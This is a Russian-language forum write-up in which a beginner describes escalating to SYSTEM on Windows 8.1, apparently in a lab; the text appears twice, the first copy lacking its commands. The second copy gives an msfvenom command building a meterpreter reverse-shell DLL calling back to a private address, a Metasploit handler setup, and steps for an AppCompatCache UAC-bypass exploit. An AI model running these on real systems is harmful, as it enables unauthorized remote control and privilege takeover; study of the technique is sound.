Всем тевирп, я новичок, я решил для себя написать статью в которой покажу как я повысил права до system, может это извращённый метод, но просто читайте её 
Попытка быстро получить SYSTEM
Собственно забрался я в систему под Windows 8.1, момент как я это сделал, я пропущу потому, что я сейчас изучаю повышение привилегий, а не как скрытно хакнуть, поэтому я просто залил чистый shell, с помощью msfvenom
Когда я получил сессию моей целью было повысить привилегии до SYSTEM!
Я тыркался в этих быстрых командах с надеждой на быстрый ХАК, но нифига
И тут я пошёл в shell, что бы посмотреть там интересное
Этап 1: Поиск вкусного
systeminfo - отображает подробную информацию о конфигурации компьютера и его операционной системы, включая конфигурацию операционной системы, информацию о безопасности, идентификатор продукта и свойства оборудования (например, ОЗУ, место на диске и сетевые карты).
Systeminfo перенаправил в текстовик, после этого я загрузил на Kali этот файл, и сейчас будем смотреть в него
Но перед этим нужно скачать exploit_suggester, например такой: GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Ищем уязвимости:
ключ -d передать файл, содержащий бюллетень безопасности Microsoft база данных
ключик -i означает передать входной файл, содержащий 'systeminfo'
Много всего давайте фильтровать, фильтровал я глазом и увидел это!
Я выбрал что сегодня будет эта уязвимость и пошёл
Этап 2: Изучение этого эксплоита
Сначала я испугался потому что не увидел кода, а plain text. Но мой примитивный анализ и чтения этого plain текста, дало мне связь в мозг что код находится на 2 строке, и я скачал его и загрузил на Windows
1) Поместите AppCompatCache.exe и Testdll.dll на диск
2) Убедитесь, что UAC включен, текущий пользователь является администратором с разделенным токеном, а параметр UAC установлен по умолчанию (нет запроса для определенных исполняемых файлов).
3) Запустите AppCompatCache из командной строки с помощью командной строки «AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll».
4) В случае успеха калькулятор должен работать от имени администратора. Если это не сработает в первый раз (и вы получите программу ComputerDefaults), повторно запустите эксплойт из 3, иногда при первом запуске возникает проблема с кэшированием/временем.
После выполнения команды "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll" я немного не понял... Какой калькулятор? мне надо права повысить
Я понял что всё дело в testdll.dll и работать надо с ним, но я новичок и я снова испугался, но не обосрался. И пошёл гуглить как сделать вредоносный dll, и в первой ссылке msfvenom мне помог!
Но и тут потом встал вопрос, я же получу reverse shell, а мне нужен то NT\SYSTEM.
Этап 3: Хакаем!
Генерируем shell
теперь я заменяю тот dll, который запускал калькулятор, на свой shell
Я понимал, что бы это сработало нужна ещё сессия, её мы и создадим
-q означает запускать без баннера
Само собой прошло всё радужно!
Но мы видим что я не SYSTEM
Но это обман!
Пишем тот самый getsystem который не сработал в первый раз, и УРА!
Крайние слова
Господа, я рад что могу тут поделиться своим творением, и обучением этичным хакингом, мне нужна мотивация и сегодня она была!
Было интересно, думаю и статья такая же, интересней чем просто взять Ethernualblue, и сразу стать SYSTEM !!!
Я смотрел один урок по повышению привилегий на системе Windows и решил поиграть с этим, и увлёкся. Пишу потому что думаю, что я так лучше запомню инфу
Попытка быстро получить SYSTEM
Собственно забрался я в систему под Windows 8.1, момент как я это сделал, я пропущу потому, что я сейчас изучаю повышение привилегий, а не как скрытно хакнуть, поэтому я просто залил чистый shell, с помощью msfvenom
Когда я получил сессию моей целью было повысить привилегии до SYSTEM!
Я тыркался в этих быстрых командах с надеждой на быстрый ХАК, но нифига
И тут я пошёл в shell, что бы посмотреть там интересное
Этап 1: Поиск вкусного
systeminfo - отображает подробную информацию о конфигурации компьютера и его операционной системы, включая конфигурацию операционной системы, информацию о безопасности, идентификатор продукта и свойства оборудования (например, ОЗУ, место на диске и сетевые карты).
Systeminfo перенаправил в текстовик, после этого я загрузил на Kali этот файл, и сейчас будем смотреть в него
Но перед этим нужно скачать exploit_suggester, например такой: GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
Ищем уязвимости:
./windows-exploit-suggester.py --update что бы использовать и обновить новую, чистую БДключ -d передать файл, содержащий бюллетень безопасности Microsoft база данных
ключик -i означает передать входной файл, содержащий 'systeminfo'
Много всего давайте фильтровать, фильтровал я глазом и увидел это!
Я выбрал что сегодня будет эта уязвимость и пошёл
Этап 2: Изучение этого эксплоита
Сначала я испугался потому что не увидел кода, а plain text. Но мой примитивный анализ и чтения этого plain текста, дало мне связь в мозг что код находится на 2 строке, и я скачал его и загрузил на Windows
1) Поместите AppCompatCache.exe и Testdll.dll на диск
2) Убедитесь, что UAC включен, текущий пользователь является администратором с разделенным токеном, а параметр UAC установлен по умолчанию (нет запроса для определенных исполняемых файлов).
3) Запустите AppCompatCache из командной строки с помощью командной строки «AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll».
4) В случае успеха калькулятор должен работать от имени администратора. Если это не сработает в первый раз (и вы получите программу ComputerDefaults), повторно запустите эксплойт из 3, иногда при первом запуске возникает проблема с кэшированием/временем.
После выполнения команды "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll" я немного не понял... Какой калькулятор? мне надо права повысить
Я понял что всё дело в testdll.dll и работать надо с ним, но я новичок и я снова испугался, но не обосрался. И пошёл гуглить как сделать вредоносный dll, и в первой ссылке msfvenom мне помог!
Но и тут потом встал вопрос, я же получу reverse shell, а мне нужен то NT\SYSTEM.
Этап 3: Хакаем!
Генерируем shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.117 LPORT=5556 -f dll > testdll.dll
теперь я заменяю тот dll, который запускал калькулятор, на свой shell
Я понимал, что бы это сработало нужна ещё сессия, её мы и создадим
msfconsole -q-q означает запускать без баннера
set payload windows/meterpreter/reverse_tcp
set lport 5556
set lhost 192.168.56.117
run
Само собой прошло всё радужно!
Но мы видим что я не SYSTEM
Но это обман!
Пишем тот самый getsystem который не сработал в первый раз, и УРА!
Крайние слова
Господа, я рад что могу тут поделиться своим творением, и обучением этичным хакингом, мне нужна мотивация и сегодня она была!
Было интересно, думаю и статья такая же, интересней чем просто взять Ethernualblue, и сразу стать SYSTEM !!!
Последнее редактирование модератором:
